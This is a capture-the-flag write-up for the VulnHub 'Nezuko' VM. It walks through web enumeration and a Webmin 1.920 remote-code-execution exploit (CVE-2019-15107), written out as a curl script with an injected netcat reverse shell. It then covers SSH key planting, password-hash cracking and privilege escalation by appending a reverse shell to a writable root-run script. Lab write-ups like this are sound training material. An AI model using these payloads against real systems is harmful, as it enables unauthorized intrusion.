Vulnhub - Nezuko writeup
Author: nezuko kamado
Let’s start our enumeration with the HTTP services.
HTTP (port 80)
If we visit the website we can see a simple message with a gif.
gobuster on the website and found few extra pages.
robots.txt there was a base32 encoded string.
I decoded it and got a message
hint from nezuko : this is not the right port to enumerate ^w^
But I still continued to look in the other dirs I found.
I visited to
/sample/ dir which had a file name
And there was literally nothing there 😄😄
Since I didn’t found anything on this port. I decided to checkout port
HTTP (port 13337)
I tried visiting this port via browser but request kept getting timedout. For some reason I was not able to open this port. But we know that there is a
Webmin server running with version
1.920 so I decided to look for some kind of exploit.
With a simple google search I found Webmin 1.920 - Remote Code Execution.
I ran the script and got
Now if we look at the code properly it’s running
echo command and then telling us whether it’s vulnerable or not.
-d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel'
If we can replace this echo command with
reverse shell code that will give us a shell.
After making changes our code would look like
#!/bin/sh URI=$1; echo -n "Testing for RCE (CVE-2019-15107) on $URI: "; curl -X POST -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/sh 192.168.56.1 1337 &new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi' if [ $? -eq 0 ]; then echo '\033[0;31mVULNERABLE!\033[0m' else echo '\033[0;32mOK! (target is not vulnerable) \033[0m' fi #EOF
I ran this script while my listener was listening and I got a shell.
I got the
nezuko.txt in the
Horizontal Privilege Escalation
First of all this is a very shitty Shell that we have right now. I tried to spwan tty shell but for some reason couldn’t.
I noticed that in the
/home/nezuko there is a
.ssh folder but the
id_rsa was empty. We can just place our own
authorized_keys and then login.
Once I did that I was able to login via SSH.
Now we have a good shell for further enumeration. I downloaded and ran
I found list of user but there was something weird with one user.
We can see the password hash for
I saved the hash to a file and used john to crack the password. I got the result within minutes.
Now we can change our user from
Vertical privilege escalation
/home/zenitsu I found
In that directory I found another dir name
to_nezuko which had a shell script named
If we look at the
/home/nezuko/from_zenitsu/ we’ll find lot of message but all of them had
root permissions meaning this script is running with root privileges.
If we look at the perms of the shell file we can see that user
zenitsu has the write to edit this file.
This mean we can just put a reverse shell code in that file and wait for this script to run.
echo "nc -e /bin/sh 192.168.56.1 4444" >> send_message_to_nezuko.sh
Now run your listener with
nc -nlvp 4444 and wait for the root shell to pop up.
After a minute or so I got the reverse shell.
And then I got the root flag.
This is pretty good machine. The thing I liked about this VM was Nothing is hard and nothing is easy in this.
Thanks to @yunaranyancat for making such a good VM.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.